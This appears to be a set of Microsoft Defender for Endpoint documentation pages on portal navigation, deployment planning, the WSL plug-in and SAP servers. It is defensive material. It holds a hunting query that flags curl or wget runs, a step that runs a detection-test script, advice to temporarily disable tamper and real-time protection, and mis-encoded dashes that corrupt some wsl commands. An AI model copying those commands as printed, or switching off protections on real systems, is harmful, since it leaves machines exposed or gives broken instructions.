-| **Actions & submissions** > **Submissions** | Navigates to the unified submissions portal, where admins can submit files to Microsoft for review. <br/><br/>To learn more, see [Submit files in Microsoft Defender for Endpoint](admin-submissions-mde.md). |
-| **Secure score** | Displays a representation of your organization's security posture along with a list of recommended actions and metrics. <br/><br/> To learn more, see [Microsoft Secure Score](../defender/microsoft-secure-score.md). |
-| **Learning hub** | Navigates to a list of learning paths that you can access to learn more about Microsoft 365 security capabilities. |
-| **Trials** | Navigates to a list of free Microsoft 365 trial subscriptions you can start. Starting a trial helps you make informed decisions about purchases or upgrades. Certain terms and conditions apply. See [Microsoft 365 trial terms and conditions](https://go.microsoft.com/fwlink/?linkid=2194722). |
-| **Partner catalog** | If you're looking for a Microsoft partner to help you with your security and other settings, check out the lists of partners in this catalog. |
-| **Assets** > **Devices** | Navigates to your list of devices that are onboarded to Defender for Endpoint. Provides information about devices, such as their exposure and risk levels. <br/><br/> To learn more, see [Device inventory](machines-view-overview.md). |
-| **Endpoints** > **Configuration management** > **Dashboard** | Navigates to a dashboard with cards that show your current security state with links to improve your score, set up your capabilities, onboard devices, and learn more about your capabilities. |
-| **Reports** | Navigates to your reports, such as your [Threat protection report](threat-protection-reports.md), [Device health and compliance report](device-health-reports.md) and your [Web protection report](web-protection-overview.md). |
-| **Health** | Includes links to the **Service health** and **Message center**. |
-| **Health** > **Service health** | Navigates to the Service health page in the Microsoft 365 admin center. This page enables you to view health status across all the services available with your organization's subscriptions. |
-| **Health** > **Message center** | Navigates to the Message center in the Microsoft 365 admin center. The Message center provides information about planned changes. Each message describes what's coming, how it might affect users, and how to manage changes. |
-| **Permissions & roles** | Enables you to grant permissions to use the Microsoft Defender portal. Permissions are granted through roles in Microsoft Entra ID. Select a role, and a flyout pane appears. The flyout contains a link to Microsoft Entra ID where you can add or remove members in a role group. <br/><br/> To learn more, see [Manage portal access using role-based access control](rbac.md). |
-| **Settings** | Navigates to general settings for your Microsoft Defender portal (listed as **Security center**) and Defender for Endpoint (listed as **Endpoints**). <br/><br/> To learn more, see [Settings](../defender/microsoft-365-defender-portal.md). |
-| **More resources** | Displays a list of more portals and centers, such as Microsoft Entra ID and the Microsoft Purview compliance portal. <br/><br/> To learn more, see [Microsoft security portals and admin centers](../defender/portals.md). |
-
-> [!TIP]
-> To learn more, see the [Microsoft Defender portal overview](../defender/microsoft-365-security-center-mde.md).
-
-## View and manage incidents & alerts
-
-When you sign into the Microsoft Defender portal, make sure to view and manage your incidents and alerts. Start with your **Incidents** list. The following image shows a list of incidents, including one with high severity, and another with medium severity.
--
-Select an incident to view details about the incident. Details include what alerts were triggered, how many devices and users were affected, and other details. The following image shows an example of incident details.
--
-Use the **Alerts**, **Devices**, and **Users** tabs to view more information, such as the alerts that were triggered, devices that were affected, and user accounts that were affected. From there, you can take manual response actions, such as isolating a device, stopping and quarantining a file, and so on.
-
-> [!TIP]
-> To learn more about using the **Incident** view, see [Manage incidents](manage-incidents.md).
-
-## Manage devices
-
-To view and manage your organization's devices, in the navigation bar, under **Assets**, select **Devices**. You see a list of devices. The list includes devices for which alerts were generated. By default, the data shown is for the past 30 days, with the most recent items listed first. Select a device to view more information about it. A flyout pane opens, as shown in the following image:
--
-The flyout pane displays details, such as any active alerts for the device, and includes links to take action, such as isolating a device.
-
-If there are active alerts on the device, you can view them in the flyout pane. Select an individual alert to view more details about it. Or, take an action, such as **Isolate device**, so you can investigate the device further while minimizing the risk of infecting other devices.
-
-> [!TIP]
-> To learn more, see [Investigate devices in the Defender for Endpoint devices list](investigate-machines.md).
-
-## View reports
-
-In Defender for Endpoint Plan 1, several reports are available in the Microsoft Defender portal. To access your reports, follow these steps:
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. In the navigation bar, choose **Reports**.
-
-3. Select a report in the list. Reports include:
-
- - Threat protection report
- - Device health report
- - Web protection report
-
-> [!TIP]
-> For more information, see [Threat protection reports](threat-protection-reports.md).
-
-### Threat protection report
-
-To access your Threat protection report, in the Microsoft Defender portal, choose **Reports**, and then choose **Threat protection**. The Threat Protection report shows alert trends, status, categories, and more. Views are arranged in two columns: **Alert trends** and **Alert status**, as shown in the following image:
--
-Scroll down to see all the views in each list.
--- By default, the views in the **Alert trends** column display data for the past 30 days, but you can set a view to display data for the last three months, last six months, or a custom time range (up to 180 days).-- The views in the **Alert status** column are a snapshot for the previous business day.-
-> [!TIP]
-> To learn more, see [Threat protection report in Defender for Endpoint](threat-protection-reports.md).
-
-### Device health report
-
-To access your Device health report, in the Microsoft Defender portal, choose **Reports**, and then choose **Device health**. The Device health report shows health state and antivirus across devices in your organization. Similar to the [Threat protection report](#threat-protection-report), views are arranged in two columns: **Device trends** and **Device summary**, as shown in the following image:
--
-Scroll down to see all the views in each list. By default, the views in the **Device trends** column display data for the past 30 days, but you can change a view to display data for the last three months, last six months, or a custom time range (up to 180 days). The **Device summary** views are snapshots for the previous business day.
-
-> [!TIP]
-> To learn more, see [Device health](device-health-reports.md).
-
-### Web protection report
-
-To access your Device health report, in the Microsoft Defender portal, choose **Reports**, and then choose **Web protection**. The Web protection report shows detections over time, such as malicious URLs and attempts to access blocked URLs, as shown in the following image:
--
-Scroll down to see all the views in the Web protection report. Some views include links that enable you to view more details, configure your threat protection features, and even manage indicators that serve as exceptions in Defender for Endpoint.
-
-> [!TIP]
-> To learn more, see [Web protection](web-protection-overview.md).
-
-## Next steps
--- [Manage Microsoft Defender for Endpoint Plan 1](manage-mde-post-migration.md)-- [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md)-
security Mde Planning Guide https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-planning-guide.md
- Title: Get started with your Microsoft Defender for Endpoint deployment
-description: Learn how to get started with the deploy, setup, licensing validation, tenant configuration, network configuration stages.
-----
- - m365-security
- - m365solution-endpointprotect
- - m365solution-scenario
- - highpri
- - tier1
- - essentials-get-started
--- Previously updated : 01/19/2024--
-# Get started with your Microsoft Defender for Endpoint deployment
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> [!TIP]
-> As a companion to this article, we recommend using the [Microsoft Defender for Endpoint automated setup guide](https://go.microsoft.com/fwlink/?linkid=2251910) when signed in to the Microsoft 365 admin center. This guide will customize your experience based on your environment. To review best practices without signing in and activating automated setup features, go to the [Microsoft 365 setup guide](https://go.microsoft.com/fwlink/?linkid=2251563).
-
-Maximize available security capabilities and better protect your enterprise from cyber threats by deploying Microsoft Defender for Endpoint and onboarding your devices. Onboarding your devices enables you to identify and stop threats quickly, prioritize risks, and evolve your defenses across operating systems and network devices.
-
-This guide provides five steps to help deploy Defender for Endpoint as your multi-platform endpoint protection solution. It helps you choose the best deployment tool, onboard devices, and configure capabilities. Each step corresponds to a separate article.
-
-The steps to deploy Defender for Endpoint are:
--
-1. [Step 1 - Set up Microsoft Defender for Endpoint deployment](production-deployment.md): This step focuses on getting your environment ready for deployment.
-2. [Step 2 - Assign roles and permissions](prepare-deployment.md): Identify and assign roles and permissions to view and manage Defender for Endpoint.
-3. [Step 3 - Identify your architecture and choose your deployment method](deployment-strategy.md): Identify your architecture and the deployment method that best suits your organization.
-4. [Step 4 - Onboard devices](onboarding.md): Assess and onboard your devices to Defender for Endpoint.
-5. [Step 5 - Configure capabilities](onboard-configure.md): You're now ready to configure Defender for Endpoint security capabilities to protect your devices.
-
-## Requirements
-
-Here's a list of prerequisites required to deploy Defender for Endpoint:
--- You're a global admin-- Your environment meets the [minimum requirements](minimum-requirements.md)-- You have a full inventory of your environment. The following table provides a starting point to gather information and ensure your environment is deeply understood by stakeholders, which helps identify potential dependencies and/or changes required in technologies or processes.-
-|What|Description|
-|||
-|Endpoint count|Total count of endpoints by operating system.|
-|Server count|Total count of Servers by operating system version.|
-|Management engine|Management engine name and version (for example, System Center Configuration Manager Current Branch 1803).|
-|CDOC distribution|High level CDOC structure (for example, Tier 1 outsourced to Contoso, Tier 2 and Tier 3 in-house distributed across Europe and Asia).|
-|Security information and event (SIEM)|SIEM technology in use.|
-
-## Next step
-
-Start your deployment with [Step 1 - Set up Microsoft Defender for Endpoint deployment](production-deployment.md)
-
security Mde Plugin Wsl https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-plugin-wsl.md
- Title: Microsoft Defender for Endpoint plug-in for Windows Subsystem for Linux (WSL)
-description: Learn how to set up and use the MDE plugin for Windows Subsystem for Linux
--------- m365-security-- tier2 Previously updated : 04/09/2024---
-# Microsoft Defender for Endpoint plug-in for Windows Subsystem for Linux (WSL)
-
-## Overview
-
-The Windows Subsystem for Linux (WSL) 2, which replaces the previous version of WSL (supported by Microsoft Defender for Endpoint without a plug-in), provides a Linux environment that is seamlessly integrated with Windows yet isolated using virtualization technology. The Microsoft Defender for Endpoint for Windows Subsystem for Linux 2 (WSL) plug-in enables Defender for Endpoint to provide more visibility into all running WSL containers, by plugging into the isolated subsystem.
-
-## Known issues and limitations
-
-Be aware of the following before you start:
-
-1. The plug-in doesn't yet automatically update. When a new plug-in version is released, the new MSI package needs to be applied to perform the update. You can apply the new package by using any tool that deploys software. Updates are coming soon through Microsoft Update. If preferred, you can continue to use the MSI package method.
-
-2. As it takes a few minutes for the plug-in to fully instantiate and up to 30 minutes for a WSL2 instance to onboard itself, short-lived WSL container instances might result in the WSL2 instance not showing up in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)). Once a (any) distribution has been running long enough (at least 30 minutes), it does show up.
-
-3. If you're using a proxy in your (test) environment, make sure that the plug-in is set up to use it correctly. WSL is typically not automatically configured to use a proxy. For more information, see the section, [Setting a proxy for Defender running in WSL](#setting-a-proxy-for-defender-running-in-wsl).
-
-4. The use of a custom kernel in combination with the plug-in is not supported. When you attempt to launch WSL with the plugin installed, you will encounter the error *A fatal error was returned by plugin 'DefenderforEndpointPlug-in'. Error message: 'Custom Kernel/Configuration not supported.'*.
-
-## Software prerequisites
--- WSL version 2.0.7 or later must be running with at least one active distro.-
- Run `wsl --update` to make sure you are on the latest version. If `wsl -ΓÇôversion` shows a version older than 2.0.7, run `wsl -ΓÇôupdate ΓÇôpre-release` to get the latest update.
--- Defender for Endpoint must be onboarded and running on the Windows host OS.--- The host OS must be running Windows 10, version 2004 and higher (build 19044 and higher) or Windows 11 to support the Windows Subsystem for Linux versions that can work with the plug-in.-
-## Software components and installer file names
-
-Installer: `DefenderPlugin-x64-0.23.1102.4.msi`. You can download it from the onboarding page in the [Microsoft Defender portal](https://security.microsoft.com).
-
-Installation directories:
--- `C:\Program Files\`--- `C:\ProgramData\`-
-Components installed:
--- `DefenderforEndpointPlug-in.dll`. This DLL is the library to load Defender for Endpoint to work within WSL. You can find it at **C:\Program Files\Microsoft Defender for Endpoint plug-in for WSL\plug-in**. --- `healthcheck.exe`. This program checks the health status of Defender for Endpoint and enables you to see the installed versions of WSL, plug-in, and Defender for Endpoint. You can find it at **C:\Program Files\Microsoft Defender for Endpoint plug-in for WSL\tools**.-
-## Installation steps
-
-If you Windows Subsystem for Linux isn't installed yet, follow these steps:
-
-1. Open Terminal or Command Prompt. (In Windows, go to **Start** > **Command Prompt**. Or, right-click the start button and then select **Terminal**.)
-
-2. Run the command `wsl -ΓÇôinstall`.
-
-### Confirm WSL is installed and running
-
-1. Using Terminal or Command Prompt, run `wsl ΓÇôupdate` to make sure you have the latest version.
-
-2. Run the `wsl` command to ensure WSL is running before testing.
-
-### Install the plug-in
-
-After WSL is running and fully up to date, follow these steps to install the plug-in:
-
-1. Install the MSI file downloaded from the onboarding section in the Microsoft Defender portal (**Settings** > **Endpoints** > **Onboarding** > **Windows Subsystem for Linux 2 (plug-in)**.)
-
-2. Open a command prompt/terminal and run `wsl`.
-
- You can [deploy the package using Microsoft Intune](/mem/intune/apps/lob-apps-windows).
-
-> [!NOTE]
-> If `WslService` is running, it stops during the installation process. You do not need to onboard the subsystem separately; instead, the plug-in automatically onboards to the tenant the Windows host is onboarded to.
-
-## Installation validation checklist
-
-1. After update or installation, wait for at least five minutes for the plug-in to fully initialize and write log output.
-
-2. Open Terminal or Command Prompt. (In Windows, go to **Start** > **Command Prompt**. Or, right-click the start button and then select **Terminal**.)
-
-3. Run the command: ```cd "C:\Program Files\Microsoft Defender for Endpoint plug-in for WSL\tools"```.
-
-4. Run the command `.\healthcheck.exe`.
-
-5. Review the details of Defender and WSL and make sure they match or exceed the following:
-
- - **Defender Plug-in Version**: `0.23.1102.4`
- - **WSL Version**: `2.0.7.0` or later
- - **WSL Defender Version**: `101.23092.0011`
- - **WSL Defender Health**: `Healthy`
-
-## Setting a proxy for Defender running in WSL
-
-This section describes how to configure proxy connectivity for the Defender for Endpoint plug-in. If your enterprise uses a proxy to provide connectivity to Defender for Endpoint running on the Windows host, continue reading to determine whether you need to configure it for the plug-in.
-
-Reuse the Defender for Endpoint static proxy setting (`TelemetryProxyServer`).
-
-If you want to use the host [static proxy](configure-proxy-internet.md) configuration for MDE for the WSL plug-in, nothing more is required. This configuration is adopted by the plug-in automatically.
-
-If you want to use the host network and network proxy setting for MDE for WSL plug-in, nothing more is required. This configuration is adopted by the plug-in automatically.
-
-## Plug-in Proxy selection
-
-If your host machine contains multiple proxy settings, the plug-in will select the proxy configurations with the following hierarchy
-
-1. Defender for Endpoint static proxy setting (`TelemetryProxyServer`)
-
-2. Winhttp proxy (configured through netsh command)
-
-3. Network & Internet proxy settings
-
-Example: If your host machine as both Winhttp proxy as well as Network & Internet proxy, plug-in will select `Winhttp proxy` as the proxy configuration for plug-in.
-
-## Connectivity test for Defender running in WSL
-
-The following procedure describes how to confirm that Defender in Endpoint in WSL has internet connectivity.
-
-1. Open Registry Editor as an administrator.
-
-2. Create a registry key with the following details:
-
- - **Name:** `ConnectivityTest`
- - **Type:** `REG_DWORD`
- - **Value:** `Number of seconds plug-in must wait before running test. (Recommended: 60 seconds)`
- - **Path:** `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\Plugins\DefenderPlug-in`
-
-3. Once the registry is set, restart wsl using the following steps:
-
- 1. Open Command Prompt and run `wsl --shutdown`.
-
- 2. Run the command `wsl`.
-
-4. Wait for 5 minutes and then run `healthcheck.exe` (located at `C:\Program Files\Microsoft Defender for Endpoint plug-in for WSL\tools` for the results of the connectivity test).
-
- If successful, the connectivity test shows success.
-
-> [!NOTE]
-> To set a proxy for use in WSL containers (the distributions running on the subsystem), see [Advanced settings configuration in WSL](/windows/wsl/wsl-config).
-
-## Verifying functionality and SOC analyst experience
-
-After installing the plug-in, the subsystem and all its running containers are onboarded to the [Microsoft Defender portal](https://security.microsoft.com).
-
-1. Sign into the Microsoft Defender portal, and open the **Devices** view.
-
-2. Filter using the tag **WSL2**.
-
- :::image type="content" source="medieplugin-wsl/wsl-device-inventory.png":::
-
- You can see all WSL instances in your environment with an active Defender for Endpoint plug-in for WSL. These instances represent all distributions running inside WSL on a given host. The hostname of a *device* matches that of the Windows host. However, it's represented as a Linux device.
-
-3. Open the device page. In the **Overview** pane, there's a link for where the device is hosted. The link enables you to understand that the device is running on a Windows host. You can then pivot to the host for further investigation and/or response.
-
- :::image type="content" source="medieplugin-wsl/wsl-ui-overview.png":::
-
-The timeline is populated, similar to Defender for Endpoint on Linux, with events from inside the subsystem (file, process, network). You can observe activity and detections in the timeline view. Alerts and incidents are generated as appropriate as well.
-
-### Test the plug-in
-
-To test the plug-in after installation, follow these steps:
-
-1. Open Terminal or Command Prompt. (In Windows, go to **Start** > **Command Prompt**. Or, right-click the start button and then select **Terminal**.)
-
-2. Run the command `wsl`.
-
-3. Download and extract the script file from [https://aka.ms/LinuxDIY](https://aka.ms/LinuxDIY).
-
-4. At the Linux prompt, run the command `./mde_linux_edr_diy.sh`.
-
- An alert should appear in the portal after a few minutes for a detection on the WSL2 instance.
-
- > [!NOTE]
- > It takes about 5 minutes for the events to appear on the Microsoft Defender portal
-
-Treat the machine as if it were a regular Linux host in your environment to perform testing against. In particular, we would like to get your feedback on the ability to surface potentially malicious behavior using the new plug-in.
-
-### Advanced hunting
-
-In the Advanced Hunting schema, under the `DeviceInfo` table, there's a new attribute called `HostDeviceId` that you can use to map a WSL instance to its Windows host device. Here are a few sample hunting queries:
-
-#### Get all WSL device IDs for the current organization/tenant
-
-```kusto
-Get all WSL device ids for the current organization/tenant
-let wsl_endpoints = DeviceInfo
-| where OSPlatform == "Linux" and isempty(HostDeviceId) != true
-| distinct DeviceId;
-wsl_endpoints
-```
-
-#### Get WSL device IDs and their corresponding host device IDs
-
-```kusto
-Get WSL device ids and their corresponding host device ids
-DeviceInfo
-| where OSPlatform == "Linux" and isempty(HostDeviceId) != true
-| distinct WSLDeviceId=DeviceId, HostDeviceId
-```
-
-#### Get a list of WSL device IDs where curl or wget was run
-
-```kusto
-Get a list of WSL device ids where curl or wget was run
-let wsl_endpoints = DeviceInfo
-| where OSPlatform == "Linux" and isempty(HostDeviceId) != true
-| distinct DeviceId;
-DeviceProcessEvents
-| where FileName == "curl" or FileName == "wget"
-| where DeviceId in (wsl_endpoints)
-| sort by Timestamp desc
-```
-
-## Troubleshooting
-
-1. The command `healthcheck.exe` shows the output, "Launch WSL distro with 'bash' command and retry in 5 minutes."
-
- :::image type="content" source="medieplugin-wsl/wsl-health-check.png":::
-
-2. If the previously mentioned error occurs, take the following steps:
-
- 1. Open a terminal instance and run the command `wsl`.
-
- 2. Wait for at least 5 minutes before rerunning the health check.
-
-3. The `healthcheck.exe` command might show the output, "Waiting for Telemetry. Please retry in 5 minutes."
-
- :::image type="content" source="medieplugin-wsl/wsl-health-check-telemetry.png":::
-
- If that error occurs, wait for 5 minutes and rerun `healthcheck.exe`.
-
-4. If you don't see any devices in the Microsoft Defender portal, or you don't see any events in the timeline, check these things:
-
- - If you aren't seeing a machine object, make sure sufficient time has passed for onboarding to complete (typically up to 10 minutes).
-
- - Make sure to use the right filters, and that you have the appropriate permissions assigned to view all device objects. (For example, is your account/group is restricted to a specific group?)
-
- - Use the health check tool to provide an overview of overall plug-in health. Open Terminal, and run the `healthcheck.exe` tool from `C:\Program Files\Microsoft Defender for Endpoint plug-in for WSL\tools`.
-
- :::image type="content" source="medieplugin-wsl/wsl-health-check-support.png":::
--- Enable the connectivity test and check for Defender for Endpoint connectivity in WSL. If the connectivity test fails, provide the output of the health check tool to [mdeforwsl-preview@microsoft.com](mailto:mdeforwsl-preview@microsoft.com).-
-5. In case you face any other challenges or issues, open the terminal and run the following commands to generate the support bundle:
-
- ```powershell
- cd "C:\Program Files\Microsoft Defender for Endpoint plug-in for WSL\tools"
- ```
-
- ```powershell
- .\healthcheck.exe --supportBundle
- ```
-
- The support bundle can be found in the path provided by the previous command.
-
- :::image type="content" source="medieplugin-wsl/wsl-health-check-overview.png":::
-
-6. Microsoft Defender Endpoint for WSL supports Linux distributions running on WSL 2. If they are associated with WSL 1, you may face issues. Therefore, it is advised to disable WSL 1. To do so with the Intune policy, perform the following steps :
-
- 1. Navigate to your Microsoft Intune admin center portal.
-
- 2. Go to Devices -> Configuration Profiles -> Create -> New Policy.
-
- 3. Select Windows 10 and later -> Settings catalog.
-
- 4. Create a name for the new profile and search for ΓÇ£Windows Subsystem for LinuxΓÇ¥ to see and add the full list of available settings.
-
- 5. Set the Allow WSL1 setting to Disabled.
-
- This will ensure only WSL 2 distributions can be used.
-
- Alternately, if you want to keep using WSL 1, or not use the Intune Policy, you can selectively associate your installed distributions to run on WSL 2, by running the command in PowerShell:
-
- ```powershell
- wsl --set-version <YourDistroName> 2
- ```
-
- To have WSL 2 as your default WSL version for new distributions to be installed in the system, run the following command in PowerShell:
-
- ```powershell
- wsl --set-default-version 2
- ```
security Mde Sap Windows Server https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-sap-windows-server.md
-
Title: "Microsoft Defender Endpoint on Windows Server with SAP"
-description: Understand how Microsoft Defender for Endpoint with EDR and other advanced security capabilities interacts with SAP applications.
--- Previously updated : 04/17/2024------- partner-contribution-
-
-
-# Microsoft Defender for Endpoint on Windows Server with SAP
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-If your organization uses SAP, it's essential to understand the compatibility and support between [antivirus](microsoft-defender-antivirus-on-windows-server.md) and [EDR](overview-endpoint-detection-response.md) in Microsoft Defender for Endpoint and your SAP applications. This article helps you understand the support provided by SAP for endpoint protection security solutions like Defender for Endpoint and how they interact with SAP applications.
-
-This article applies to Microsoft Defender for Endpoint running on Windows Server with SAP applications such, as NetWeaver, S4 Hana, and SAP standalone engines, such as LiveCache. In this article, we focus on antivirus and EDR capabilities in Defender for Endpoint. For an overview of all of the Defender for Endpoint capabilities, see [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md).
-
-This article doesn't cover SAP client software, such as SAPGUI or Microsoft Defender Antivirus on Windows client devices.
-
-## Enterprise security and your SAP Basis team
-
-Enterprise security is a specialist role and the activities described in this article should be planned as a joint activity between your enterprise security team and the SAP Basis team. The enterprise security team needs to coordinate with the SAP Basis team and jointly design the Defender for Endpoint configuration and analyze any exclusions.
-
-### Get an overview of Defender for Endpoint
-
-Defender for Endpoint is a component of [Microsoft Defender XDR](/microsoft-365/security/defender/), and can be integrated with your SIEM/SOAR solution.
-
-Before you begin to plan or deploy Defender for Endpoint on Windows Server with SAP, take a moment to get an overview of Defender for Endpoint. The following video provides an overview:
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4wDob]
-
-For more detailed information about Defender for Endpoint and Microsoft security offerings, see the following resources:
--- [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md)-- [Microsoft Security documentation and training - Security documentation](/security/)-
-Defender for Endpoint includes capabilities that are beyond the scope of this article. In this article, we focus on two main areas:
--- **Next-generation protection** (which includes antivirus protection). [Next-generation protection](/microsoft-365/security/defender-endpoint/next-generation-protection) is an antivirus product like other antivirus solutions for Windows environments.-- **Endpoint Detection and Response** (EDR). [EDR capabilities](overview-endpoint-detection-response.md) detect suspicious activity and system calls, and provide an extra layer of protection against threats that bypassed antivirus protection. -
-Microsoft and other security software vendors track threats and provide trend information. For information, see [Cyberthreats, viruses, and malware - Microsoft Security Intelligence](https://www.microsoft.com/en-us/wdsi/threats).
-
-> [!NOTE]
-> For information on Microsoft Defender for SAP on Linux, see [Deployment guidance for Microsoft Defender for Endpoint on Linux for SAP](/microsoft-365/security/defender-endpoint/mde-linux-deployment-on-sap). Defender for Endpoint on Linux is significantly different than the Windows version.
-
-## SAP support statement on Defender for Endpoint and other security solutions
-
-SAP provides basic documentation for conventional file scan antivirus solutions. Conventional file scan antivirus solutions compare file signatures against a database of known threats. When an infected file is identified, the antivirus software typically alerts and quarantines the file. The mechanisms and behavior of file scan antivirus solutions are reasonably well known and are predictable; therefore, SAP support can provide a basic level of support for SAP applications interacting with file scan antivirus software.
-
-File based threats are now only one possible vector for malicious software. Fileless malware and malware that lives off the land, highly polymorphic threats that mutate faster than traditional solutions can keep up with, and human-operated attacks that adapt to what adversaries find on compromised devices. Traditional antivirus security solutions aren't sufficient to stop such attacks. Artificial intelligence (AI) and device learning (ML) backed capabilities, such as behavioral blocking and containment are required. Security software such as Defender for Endpoint has advanced threat protection features to mitigate modern threats.
-
-Defender for Endpoint is continuously monitoring operating system calls, such as file read, file write, create socket, and other process level operations. The Defender for Endpoint EDR sensor acquires opportunistic locks on local NTFS files systems and is, therefore, unlikely to impact applications. Opportunistic locks aren't possible on remote network file systems. In rare cases, a lock could cause general nonspecific errors, such as *Access Denied* in SAP applications.
-
-SAP isn't able to provide any level of support for EDR/XDR software like [Microsoft Defender XDR](../defender/microsoft-365-defender.md) or [Defender for Endpoint](microsoft-defender-endpoint.md). The mechanisms in such solutions are adaptive; therefore, they're not predictable. Further, issues are potentially not reproducible. When problems are identified on systems running advanced security solutions, SAP recommends disabling the security software and then attempting to reproduce the problem. A support case can then be raised with the security software vendor.
-
-For more information about the SAP Support policy, see [3356389 - Antivirus or other security software affecting SAP operations](https://me.sap.com/notes/3356389).
-
-## Recommended SAP OSS Notes
-
-Here's a list of SAP articles you can use as needed:
--- [3356389 - Antivirus or other security software affecting SAP operations - SAP for Me](https://me.sap.com/notes/3356389)--- [106267 - Virus scanner software on Windows - SAP for Me](https://me.sap.com/notes/106267)--- [690449 - Transport buffer lock file (.LOB) remains blocked on Windows - SAP for Me](https://me.sap.com/notes/690449)--- [2311946 - Filesystem errors on Windows - SAP for Me](https://me.sap.com/notes/2311946)--- [2496239 - Ransomware / malware on Windows - SAP for Me](https://me.sap.com/notes/2496239)--- [1497394 - Which files and directories should be excluded from an antivirus scan for SAP BusinessObjects Business Intelligence Platform products in Windows? - SAP for Me](https://me.sap.com/notes/1497394/E)-
-## SAP applications on Windows Server: Top 10 recommendations
-
-1. **Limit access to SAP servers, block network ports, and take all other common security protection measures**. This first step is essential. The threat landscape has evolved from file-based viruses to file-less complex and sophisticated threats. Actions, such as **blocking ports and limiting logon/access** to VMs are **no longer considered sufficient** to fully mitigate modern threats.
-
-2. **Deploy Defender for Endpoint to nonproductive systems first before deploying to production systems**. Deploying Defender for Endpoint directly to production systems without testing is highly risky and can lead to downtime. If you can't delay deploying Defender for Endpoint to your production systems, consider temporarily disabling [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) and [real-time protection](configure-protection-features-microsoft-defender-antivirus.md).
-
-3. **Remember that real-time protection is enabled by default in Windows Server**. If problems are identified that might be related to Defender for Endpoint, it's recommended to [configure exclusions](defender-endpoint-antivirus-exclusions.md) and/or [open a support case](contact-support.md) via the Microsoft Defender portal.
-
-4. **Have the SAP Basis team and your security team work together on Defender for Endpoint deployment**. The two teams need to jointly create a phased deployment, testing, and monitoring plan.
-
-5. **Use tools like PerfMon (Windows) to create a performance baseline before deploying and activating Defender for Endpoint**. Compare the performance utilization before and after activating Defender for Endpoint. See [perfmon](/windows-server/administration/windows-commands/perfmon).
-
-6. **Deploy the latest version of Defender for Endpoint and use the latest releases of Windows**, ideally Windows Server 2019 or newer. See [Minimum requirements for Microsoft Defender for Endpoint](minimum-requirements.md).
-
-7. **Configure certain exclusions for Microsoft Defender Antivirus**. These include:
-
- - DBMS data files, log files, and temp files, including disks containing backup files
- - The entire contents of the SAPMNT directory
- - The entire contents of the SAPLOC directory
- - The entire contents of the TRANS directory
- - The entire contents of directories for standalone engines such as TREX
-
- Advanced users can consider using [contextual file and folder exclusions](configure-contextual-file-folder-exclusions-microsoft-defender-antivirus.md).
-
- For more information about DBMS exclusions, use the following resources:
-
- - **SQL Server**: [Configure antivirus software to work with SQL Server](/troubleshoot/sql/database-engine/security/antivirus-and-sql-server)
- - **Oracle**: [How To Configure Anti-Virus On Oracle Database Server (Doc ID 782354.1)](https://support.oracle.com/knowledge/Oracle%20Database%20Products/782354_1.html)
- - **DB2** ΓÇô [Which DB2 directories to exclude from Linux Anti-virus software](https://www.ibm.com/support/pages/which-db2-directories-exclude-linux-anti-virus-software) (use the same commands on Windows Server)
- - **SAP ASE**: Contact SAP
- - **MaxDB**: Contact SAP
-
-8. **Verify Defender for Endpoint settings**. Microsoft Defender Antivirus with SAP applications should have the following settings in most cases:
-
- - `AntivirusEnabled : True`
- - `AntivirusSignatureAge : 0`
- - `BehaviorMonitorEnabled : True`
- - `DefenderSignaturesOutOfDate : False`
- - `IsTamperProtected : True`
- - `RealTimeProtectionEnabled : True`
-
-9. **Use tools, such as [Intune](/mem/intune/protect/endpoint-security) or [Defender for Endpoint security settings management](/mem/intune/protect/mde-security-integration) to set up Defender for Endpoint**. Such tools can help ensure that Defender for Endpoint is configured correctly and uniformly deployed.
-
- To use Defender for Endpoint security settings management, in the Microsoft Defender portal, go to **Endpoints** > **Configuration management** > **Endpoint security policies**, and then select **Create new Policy**. For more information, see [Manage endpoint security policies in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/manage-security-policies).
-
-10. **Use the latest release of Defender for Endpoint**. Several new features are being implemented in Defender for Endpoint on Windows, and these features were tested with SAP systems. These new features reduce blocking and lower CPU consumption. For more information about new features, see [What's new in Microsoft Defender for Endpoint](whats-new-in-microsoft-defender-endpoint.md).
-
-## Deployment methodology
-
-SAP and Microsoft both don't recommend deploying Defender for Endpoint on Windows directly to all development, QAS, and production systems simultaneously, and/or without careful testing and monitoring. Customers who deployed Defender for Endpoint and other similar software in an uncontrolled manner without adequate testing experienced system downtime as a result.
-
-Defender for Endpoint on Windows and any other software or configuration change should be deployed into development systems first, validated in QAS, and only then deployed into production environments.
-
-Using tools, such as [Defender for Endpoint security settings management](/mem/intune/protect/mde-security-integration) to deploy Defender for Endpoint to an entire SAP landscape without testing is likely to cause downtime.
-
-Here's a list of what to check:
-
-1. **Deploy Defender for Endpoint with [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) enabled**. If issues arise, enable [troubleshooting mode](enable-troubleshooting-mode.md), disable [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md), disable [real-time protection](configure-protection-features-microsoft-defender-antivirus.md), and configure [scheduled scans](schedule-antivirus-scans.md).
-
-2. **Exclude DBMS files and executables** following your DBMS vendor recommendations.
-
